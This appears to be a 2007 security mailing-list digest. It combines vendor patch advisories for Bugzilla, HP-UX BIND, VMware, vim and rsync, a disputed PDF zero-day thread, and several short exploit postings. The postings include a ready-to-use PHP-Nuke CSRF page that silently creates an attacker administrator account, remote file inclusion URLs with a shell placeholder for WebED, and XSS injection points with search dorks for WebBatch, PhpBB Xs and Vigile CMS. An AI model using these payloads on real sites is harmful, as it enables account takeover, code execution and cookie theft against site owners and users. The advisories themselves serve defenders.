Security Advisory for Bugzilla 3.0.1 and 3.1.1
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Summary === Bugzilla is a Web-based bug-tracking system, used by a large number of software projects. This advisory covers a critical security issue that has recently been fixed in the Bugzilla code: * Even with account creation disabled, users can use the WebService to create an account. We strongly advise that 2.23.x and 3.0.x users upgrade to 3.0.2 immediately. Users of CVS HEAD or 3.1.1 should upgrade to 3.1.2 immediately. This is critical if you have a requirelogin installation and also have the WebService enabled. Vulnerability Details = Class: Unauthorized Access Versions:2.23.3 and above. Description: Bugzilla::WebService::User::offer_account_by_email does not check the createemailregexp parameter, and thus allows users to create accounts who would normally be denied account creation. The emailregexp parameter is still checked. If you do not have the SOAP::Lite Perl module installed on your Bugzilla system, your system is not vulnerable (because the Bugzilla WebService will not be enabled). Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=395632 Vulnerability Solutions === The fix for the security bug mentioned in this advisory is included in the 3.0.2 and 3.1.2 releases. Upgrading to these releases will protect installations from possible exploits of this issue. Full release downloads, patches to upgrade Bugzilla from previous versions, and CVS upgrade instructions are available at: http://www.bugzilla.org/download/ If you are unable to upgrade, you should IMMEDIATELY apply the appropriate patch for your version: 2.23.x 3.0.x: https://bugzilla.mozilla.org/attachment.cgi?id=280385 3.1.x: https://bugzilla.mozilla.org/attachment.cgi?id=280316 Credits === The Bugzilla team wish to thank the following people for their assistance in locating, advising us of, and assisting us to fix this issue: Sascha Jensen Frédéric Buclin Max Kanat-Alexander Marc Schumann General information about the Bugzilla bug-tracking system can be found at: http://www.bugzilla.org/ Comments and follow-ups can be directed to the mozilla.support.bugzilla newsgroup or the support-bugzilla mailing list. http://www.bugzilla.org/support/ has directions for accessing these forums. - -Max Kanat-Alexander Release Manager, Bugzilla Project -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFG8aCnaL2D/aEJPK4RAmvIAKDV/8QLPzBh3FIquCISug1SScQIQwCg568R sDrDqfbLXfcjA/MQ+rTdPLM= =CH0G -END PGP SIGNATURE-
0day: PDF pwns Windows
http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
[Mlabs] Scrutinising SIP Payloads : Traversing Attack Vectors in VOIP and IM
Hi I have released core research paper on SIP comprising of Payload problems and Attack vectors. This research paper lays stress on the potential weaknesses present in the SIP which make it vulnerable to stringent attacks. The point of discussion is to understand the weak spots in the protocol. The payloads constitute the request vectors. The protocol inherits well defined security procedures and implementation objects. The security model is hierarchical and is diverged in every working layer of SIP from top to bottom. SIP features can be exploited easily if definitive attack base is subjugated. We will discuss about inherited flaws and methods to combat against predefined attacks. The payloads have to be scrutinized at the network level. It is critical because payloads are considered as infection bases to infect networks . The pros and cons will be enumerated from security perspective. You can download paper at: http://mlabs.secniche.org/papers/Scruti_SIP_Payloads.pdf Regards Aks aka 0kn0ck
[security bulletin] HPSBUX02251 SSRT071449 rev.2 - HP-UX Running BIND, Remote DNS Cache Poisoning
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01123426 Version: 2 HPSBUX02251 SSRT071449 rev.2 - HP-UX Running BIND, Remote DNS Cache Poisoning NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-08-01 Last Updated: 2007-09-10 Potential Security Impact: Remote DNS cache poisoning Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential vulnerability has been identified with HP-UX running BIND. The vulnerability could be exploited remotely to cause DNS cache poisoning. References: CVE-2007-2926 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.2 or BIND v9.3 BACKGROUND To determine if a system has an affected version, search the output of swlist -a revision -l fileset for an affected fileset. Then determine if the recommended patch or update is installed. AFFECTED VERSIONS For BIND v9.2.0 HP-UX B.11.11 = BINDv920.INETSVCS-BIND - -action: install BIND920_v10.depot HP-UX B.11.23 = InternetSrvcs.INETSVCS2-RUN - -action: install PHNE_36973 or subsequent For BIND v9.3.2 HP-UX B.11.11 = BindUpgrade.BIND-UPGRADE - -action: install revision C.9.3.2.2.0 or subsequent URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND HP-UX B.11.23 = BindUpgrade.BIND2-UPGRADE - -action: install revision C.9.3.2.2.0 or subsequent URL: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND HP-UX B.11.31 = NameService.BIND-RUN action: install named binary file END AFFECTED VERSIONS RESOLUTION HP has provided the following software updates and patches to resolve the vulnerability. The patch is available from http://itrc.hp.com The updates are available from http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=BIND - -BIND v9.2.0 HP-UX B.11.11 contact HP Support to receive BIND920_v10.depot or upgrade to BIND v9.3.2 revision C.9.3.2.2.0 or subsequent - -BIND v9.2.0 HP-UX B.11.23 install PHNE_36973 or subsequent - -BIND v9.3.2 HP-UX B.11.11 install revision C.9.3.2.2.0 or subsequent - -BIND v9.3.2 HP-UX B.11.23 install revision C.9.3.2.2.0 or subsequent BIND v9.3.2 HP-UX B.11.31 install named as discussed below Until a patch or upgrade is released for HP-UX B.11.31, HP has made binary files available to resolve the vulnerability. Please use the following process to download and install the binary file. 1. Download the appropriate named file from this ftp site into a secure directory: ftp://ss071449:[EMAIL PROTECTED]/ 2. Unpack using gunzip and verify the cksum or md5sum: 1406468692 4225172 named_9.3.2_11.31IA 400611368 2269184 named_9.3.2_11.31PA MD5 (named_9.3.2_11.31IA) = 9bd93b513fde895ebc32602824db3341 MD5 (named_9.3.2_11.31PA) = 81041c98b5699d90e0d90cca14f90d18 3. Stop the DNS server: If named is normally started and stopped during system reboot, use this command: /sbin/init.d/named stop If rndc is in use, from the managing server issue ths command: rndc stop If not using rndc enter this command as root on the system running named: sig_named kill 4. Confirm that named is no longer running: ps -ef | grep named Ignore any lines containing 'grep named'. 5. Replace named with the appropriate downloaded file. Confirm that the downloaded file has permissions/ower/group of '544 bin bin'. Set the ownership and permissions if necessary. cp downloaded file /usr/sbin/named 6. Restart named If named is normally started during the system reboot: /sbin/init.d/named start Otherwise, restart named using procedures established for the system. MANUAL ACTIONS: Yes - NonUpdate BIND v9.2.0 HP-UX B.11.11 - contact HP Support or upgrade to BIND v9.3.2 BIND v9.3.2 HP-UX B.11.31 - install named file PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 1 August 2007 Initial release Version: 2 (rev.2) - 10 September 2007 patch and updates available Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related
VMSA-2007-0006 Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 - - --- VMware Security Advisory Advisory ID: VMSA-2007-0006 Synopsis: Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player Issue date:2007-09-18 Updated on:2007-09-18 CVE numbers: CVE-2007-2446 CVE-2007-2447 CVE-2007-0494 CVE-2007-2442 CVE-2007-2443 CVE-2007-2798 CVE-2007-0061 CVE-2007-0062 CVE-2007-0063 CVE-2007-4059 CVE-2007-4155 CVE-2007-4496 CVE-2007-4497 CVE-2007-1856 CVE-2006-1174 CVE-2006-4600 CVE-2004-0813 CVE-2007-1716 CVE-2006-3619 CVE-2006-4146 - - --- 1. Summary: Updated versions of all supported hosted products and all ESX 2x products and patches for ESX 30x address critical security updates. Service Console security updates for samba, bind, krb5, vixie-cron, shadow-utils, openldap, pam, gcc, and gdb packages. 2. Relevant releases: VMware Workstation 6.0.0 VMware Player 2.0.0 VMware ACE 2.0.0 VMware Workstation prior to 5.5.5 VMware Player prior to 1.0.5 VMware Server prior to 1.0.4 VMware ACE prior to 1.0.4 VMware ESX 3.0.2 without patches ESX-1001725 ESX-1001731 ESX-1001726 ESX-1001727 ESX-1001728 ESX-1001729 ESX-1001730 VMware ESX 3.0.1 without patches ESX-8258730 ESX-1001213 ESX-1001691 ESX-1001723 ESX-1001214 ESX-1001692 ESX-1001693 ESX-1001694 ESX-8253547 ESX-8567382 VMware ESX 3.0.0 without patches ESX-4809553 ESX-1001204 ESX-1001206 ESX-1001212 ESX-1001205 ESX-1001207 ESX-1001208 ESX-1001209 ESX-1001210 ESX-1001211 VMware ESX 2.5.4 prior to upgrade patch 10 (Build# 53326) VMware ESX 2.5.3 prior to upgrade patch 13 (Build# 52488) VMware ESX 2.1.3 prior to upgrade patch 8 (Build# 53228) VMware ESX 2.0.2 prior to upgrade patch 8 (Build# 52650) 3. Problem description: Problems addressed by these patches: IArbitrary code execution and denial of service vulnerabilities This release fixes a security vulnerability that could allow a guest operating system user with administrative privileges to cause memory corruption in a host process, and thus potentially execute arbitrary code on the host. (CVE-2007-4496) This release fixes a denial of service vulnerability that could allow a guest operating system to cause a host process to become unresponsive or exit unexpectedly. (CVE-2007-4497) Thanks to Rafal Wojtczvk of McAfee for identifying and reporting these issues. ESX --- VMware ESX 3.0.1 Download Patch Bundle ESX-8258730 http://www.vmware.com/support/vi3/doc/esx-8258730-patch.html md5sum a06d0e36e403b0fe6bc6fbc76220a86d VMware ESX 3.0.0 Download Patch Bundle ESX-4809553 http://www.vmware.com/support/vi3/doc/esx-4809553-patch.html md5sum cd363526aab5fa6c45bf2509cb5ae500 NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users should upgrade to at least 3.0.1 and preferably the newest release available. VMware ESX 2.5.4 upgrade to patch 10 (Build# 53326) VMware ESX 2.5.3 upgrade to patch 13 (Build# 52488) VMware ESX 2.1.3 upgrade to patch 8 (Build# 53228) VMware ESX 2.0.2 upgrade to patch 8 (Build# 52650) NOTE: ESX 3.0.2 is not affected by this issue Hosted products --- VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) VMware Player 2.0.0 upgrade to version 2.0.1 (Build# 55017) VMware Player 1.0.4 upgrade to version 1.0.5 (Build# 56455) VMware Server 1.0.3 upgrade to version 1.0.4 (Build# 56528) VMware ACE 2.0.0 upgrade to version 2.0.1 (Build# 55017) VMware ACE 1.0.3 upgrade to version 1.0.4 (Build# 54075) II Hosted products DHCP security vulnerabilities addressed This release fixes several vulnerabilities in the DHCP server that could enable a specially crafted packets to gain system-level privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063) Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security Systems X-Force for discovering and researching these vulnerabilities. Hosted products --- VMware Workstation 6.0.0 upgrade to version 6.0.1 (Build# 55017) VMware Workstation 5.5.4 upgrade to version 5.5.5 (Build# 56455) VMware Player 2.0.0
[SECURITY] [DSA 1364-2] New vim packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - -- Debian Security Advisory DSA 1364-2[EMAIL PROTECTED] http://www.debian.org/security/ dann frazier September 19th, 2007http://www.debian.org/security/faq - - -- Package: vim Vulnerability : several Problem-Type : local(remote) Debian-specific: no CVE ID : CVE-2007-2438 CVE-2007-2953 Several vulnerabilities have been discovered in the vim editor. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-2953 Ulf Harnhammar discovered that a format string flaw in helptags_one() from src/ex_cmds.c (triggered through the helptags command) can lead to the execution of arbitrary code. CVE-2007-2438 Editors often provide a way to embed editor configuration commands (aka modelines) which are executed once a file is opened. Harmful commands are filtered by a sandbox mechanism. It was discovered that function calls to writefile(), feedkeys() and system() were not filtered, allowing shell command execution with a carefully crafted file opened in vim. This updated advisory repairs issues with missing files in the packages for the oldstable distribution (sarge) for the alpha, mips, and mipsel architectures. For the oldstable distribution (sarge) these problems have been fixed in version 6.3-071+1sarge2. Sarge is not affected by CVE-2007-2438. For the stable distribution (etch) these problems have been fixed in version 7.0-122+1etch3. For the unstable distribution (sid) these problems have been fixed in version 7.1-056+1. We recommend that you upgrade your vim packages. Upgrade Instructions - - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - - Source archives: http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2.dsc Size/MD5 checksum: 1376 a447ab6dba1d93c924841af4234e0f5b http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2.diff.gz Size/MD5 checksum: 262331 96005f014eb64ad9e9056daf0f578582 http://security.debian.org/pool/updates/main/v/vim/vim_6.3.orig.tar.gz Size/MD5 checksum: 5624622 de1c964ceedbc13538da87d2d73fd117 Architecture independent components: http://security.debian.org/pool/updates/main/v/vim/vim-common_6.3-071+1sarge2_all.deb Size/MD5 checksum: 3424544 bd11013f7a21dfa3b6ba0c819eec5cc6 http://security.debian.org/pool/updates/main/v/vim/vim-doc_6.3-071+1sarge2_all.deb Size/MD5 checksum: 1649542 d7d8c03c0c8247a253dbb261fa40d983 Alpha architecture: http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 897132 9b1b19c22a65bd4046684a603ea60146 http://security.debian.org/pool/updates/main/v/vim/vim-full_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 987420 0f50e5570e94d0d24544770ffe0cf4f6 http://security.debian.org/pool/updates/main/v/vim/vim-gnome_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 945902 9a583b7323e9907362cd4a5b5dd9054d http://security.debian.org/pool/updates/main/v/vim/vim-gtk_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 942798 70d57f86db028310f41981c4a7b108a1 http://security.debian.org/pool/updates/main/v/vim/vim-lesstif_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 882500 d7a02c364f09a4ae502b3cc9180b83b4 http://security.debian.org/pool/updates/main/v/vim/vim-perl_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 959276 4895da0a62b9adf22868d7917bb5974e http://security.debian.org/pool/updates/main/v/vim/vim-python_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 954374 5e43d44823c54f75d58dd920b84675c5 http://security.debian.org/pool/updates/main/v/vim/vim-ruby_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 949052 2df101622632733db64ffb1a1be758e3 http://security.debian.org/pool/updates/main/v/vim/vim-tcl_6.3-071+1sarge2+b1_alpha.deb Size/MD5 checksum: 953728 f36fba9f17e9364f87fe3fc9baab286a AMD64 architecture: http://security.debian.org/pool/updates/main/v/vim/vim_6.3-071+1sarge2_amd64.deb Size/MD5 checksum: 770114 6f1818ee5504c2b0a5e52ee8d41b1806 http://security.debian.org/pool/updates/main/v/vim/vim-full_6.3-071+1sarge2_amd64.deb Size/MD5 checksum: 835450
[security bulletin] HPSBUX02249 SSRT071442 rev.2 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01118367 Version: 2 HPSBUX02249 SSRT071442 rev.2 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-08-20 Last Updated: 2007-09-12 Potential Security Impact: Local unqualified configuration change Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified in HP-UX running the Ignite-UX or the DynRootDisk (DRD) get_system_info command. This command can change system networking parameters without notification. References: none SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running the Ignite-UX vC.7.0, vC.7.1, vC.7.2, vC.7.3 or the DynRootDisk (DRD) vA.1.0.16.417, vA.1.0.18.245, vA.1.1.0.344, vA.2.0.0.592 get_system_info command. BACKGROUND The get_system_info command is executed by the following commands: make_net_recovery make_tape_recovery save_config drd To determine if an HP-UX system has an affected version, search the output of swlist -a revision -l fileset for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS HP-UX B.11.11 HP-UX B.11.23 HP-UX B.11.31 = Ignite-UX.MGMT-TOOLS,revision=C.7.0.212 - -Ignite-UX.MGMT-TOOLS,revision=C.7.1.93 - -Ignite-UX.MGMT-TOOLS,revision=C.7.2.94 Ignite-UX.MGMT-TOOLS,revision=C.7.3.144 action: use the script from the Resolution to work around the vulnerability HP-UX B.11.23 HP-UX B.11.31 = DRD.DRD-RUN,revision=A.1.0.16.417 DRD.DRD-RUN,revision=A.1.0.18.245 DRD.DRD-RUN,revision=A.1.1.0.344 DRD.DRD-RUN,revision=A.2.0.0.592 action: use the script from the Resolution to work around the vulnerability END AFFECTED VERSIONS RESOLUTION Until an update is available, HP has made the following workaround procedure available to resolve the issue. - - Note: The script has changed. The script recommended in rev.1 of this Security Bulletin did not correctly check the HP Ignite-UX revision number. The original script would only install itself on HP Ignite-UX revision C.7.3.144. The new script documented below will work properly on all vulnerable revisions of HP Ignite-UX. Either the old or new script will work correctly with DynRootDisk. - -The procedure below moves the get_system_info program to another directory and replaces it with a script. The script temporarily disables the autopush program, runs the original get_system_info, and then enables autopush. By running the original get_system_info program with antopush disabled the vulnerability is avoided. More details are documented in the script. 1. Download the script get_system_info.wrapper from the following ftp site: ftp://ss071442:[EMAIL PROTECTED]/ 2 .Verify the cksum or md5 sum: - -cksum: 2284708550 5344 get_system_info.wrapper - -MD5 (get_system_info.wrapper) = 6ed1dfc6508e2cb45f8624a8ed31611f - -The new script contains this line: # @(#) $Date: 2007-09-11 10:30:49 -0600 (Tue, 11 Sep 2007) $ $Revision: 71524 $ 3. As root, copy the script into a secure directory. 4. As root, run the script. The script will display the files it is replacing. For example: #$secure_directory/get_system_info.wrapper Replacing /opt/ignite/lbin/get_system_info with $secure_directory/get_system_info.wrapper Replacing /opt/drd/lbin/get_system_info with $secure_directory/get_system_info.wrapper where $secure_directory is the path to the secure directory containing the script. 5. The script must be executed whenever a vulnerable version of the fileset Ignite-UX.MGMT-TOOLS or the fileset DRD.DRD-RUN is reinstalled. MANUAL ACTIONS: Yes - NonUpdate Use script in Resolution section to work around the vulnerability PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa HISTORY Version: 1 (rev.1) - 20 August 2007 Initial release Version: 2 (rev.2) - 12 September 2007 new script, corrected revision numbers Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is
WebBatch Applications Cross Site Scripting Vulrnability
[HSC] WebBatch Applications Cross Site Scripting Vulrnability This issue is due to a failure in the application to properly sanitize user-supplied input. Attackers may exploit this issue via a web client. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Hackers Center Security Group (http://www.hackerscenter.com) Credit: Doz Risk: Medium Class: Input Validation Error Remote: YES Local: N/A Platform: Windows Servers Vendor: Wilson WindowWare, Inc Product: WebBatch http://winbatch.com/ Vulrnable Files: webbatch.exe * Attackers can exploit these issues via a web client. Exploits: /webcgi/webbatch.exe?XSS /webcgi/webbatch.exe?PATH/XSS Remote System Info Exposure: /webcgi/webbatch.exe?dumpinputdata Google Search: (webbatch.exe) http://www.google.com/search?hl=enq=ext%3Aexe+inurl%3A%28%7Cwebbatch%7C%29btnG=Search Only becoming a Ethical Hacker, you can stop a Hacker. Learn with out having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
SimplePHPBlog Hacking
How to hack a server with Simple PHP Blog uploading an htacess file from img_upload_cgi.php page. Tested on v0.4.9 by Demential http://www.hackish.eu mailto: [EMAIL PROTECTED] video here: http://hackish.eu/video/phpblog.avi vlc download: http://www.videolan.org/vlc/
Re: 0day: PDF pwns Windows
Impressive vulnerability, new. Not a 0day. Not to start an argument again, but fact is, people stop calling everything a 0day unless it is, say WMF, ANI, etc. exploited in the wild without being known. I don't like the mis-use of this buzzword. Gadi. On Thu, 20 Sep 2007, pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
Re: Security Advisory for Bugzilla 3.0.1 and 3.1.1
What about 2.20?
Re: 0day: PDF pwns Windows
My upcoming research feature everything regarding this and the issue you have already discussed. really :).. which one... the one from last year? On 9/20/07, Aditya K Sood [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers Hi Your point is right. But there are a number of factors other than this in exploiting pdf in other sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restriction on READ in PDF in most of the versions. Only outbound data is filtered to some extent. you can even read /etc/passwd file from inside of PDF. Other infection vector includes infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research feature everything regarding this and the issue you have already discussed. Regards Aks http://ww.secniche.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org
PhpBB Xs 2 profile.php Permanent Xss Vulnerability
+++ PhpBB Xs 2 profile.php Permanent Xss Vulnerability +++ #Found By Seph1roth +++ [POST METHOD] Corrupted page: profile.php?mode=editprofilecpl_mode=profile_info Bugged Variable: selfdes (Campo Altre informazioni) Xss: /textarea[XSS STRING]
WebED-0.8999 Multiple Remote File Inclusion Vulnerability
--- Multiple Remote File Inclusion Vulnerability --- # Founded by : Seph1roth # Download Script: http://sourceforge.net/projects/ed-engine/ WebED-0.8999.tar.gz # Exploit: # http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell] # http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell] ---
PHP-Nuke add admin ALL Versions
Paste this code into an HTML page then link it to victim (victim must be admin) iframe name=aiuto frameborder=0 height=0 width=0/iframe FORM name=Faiuto ACTION=http://VICTIMURL/nuke/admin.php; target=aiuto METHOD=POST input type=hidden NAME=add_name value=ATTACKER input type=hidden NAME=add_aid value=ATTACKER input type=hidden NAME=add_email value=[EMAIL PROTECTED] input type=hidden NAME=add_url value=YOURSITE input type=hidden NAME=add_admlanguage value=italian input type=hidden NAME=add_radminsuper value=1 input type=hidden NAME=add_pwd value=YOURPASSWORD input type=hidden NAME=op value=AddAuthor input type=image height=0 width=0 /FORMSCRIPTdocument.Faiuto.submit()/SCRIPT You are admin now ;) Then you can log in into phpnuke with user HACKER and pass YOURPASSWORD...
Re: 0day: PDF pwns Windows
pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers Hi Your point is right. But there are a number of factors other than this in exploiting pdf in other sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restriction on READ in PDF in most of the versions. Only outbound data is filtered to some extent. you can even read /etc/passwd file from inside of PDF. Other infection vector includes infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research feature everything regarding this and the issue you have already discussed. Regards Aks http://ww.secniche.org
Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability # Download : http://www.itcms.it/ # Date : 20-09-2007 # Author : x0kster # Mail : [EMAIL PROTECTED] # Note : For works, the wiki or the download module must be installed in the site. # # PoCs : # # Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]title=[XSS] # Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS] # Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]cat=[XSS] # Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS] # # # Dork : tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarà eliminata dietro segnalazione.
[ GLSA 200709-13 ] rsync: Two buffer overflows
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200709-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: rsync: Two buffer overflows Date: September 20, 2007 Bugs: #189132 ID: 200709-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two user-assisted buffer overflow vulnerabilities have been discovered in rsync. Background == rsync is a file transfer program to keep remote directories synchronized. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/rsync 2.6.9-r3 = 2.6.9-r3 Description === Sebastian Krahmer from the SUSE Security Team discovered two off-by-one errors in the function f_name() in file sender.c when processing overly long directory names. Impact == A remote attacker could entice a user to synchronize a repository containing specially crafted directories, leading to the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All rsync users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/rsync-2.6.9-r3 References == [ 1 ] CVE-2007-4091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4091 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200709-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp7cLIkfdLVk.pgp Description: PGP signature
rPSA-2007-0194-1 kdebase
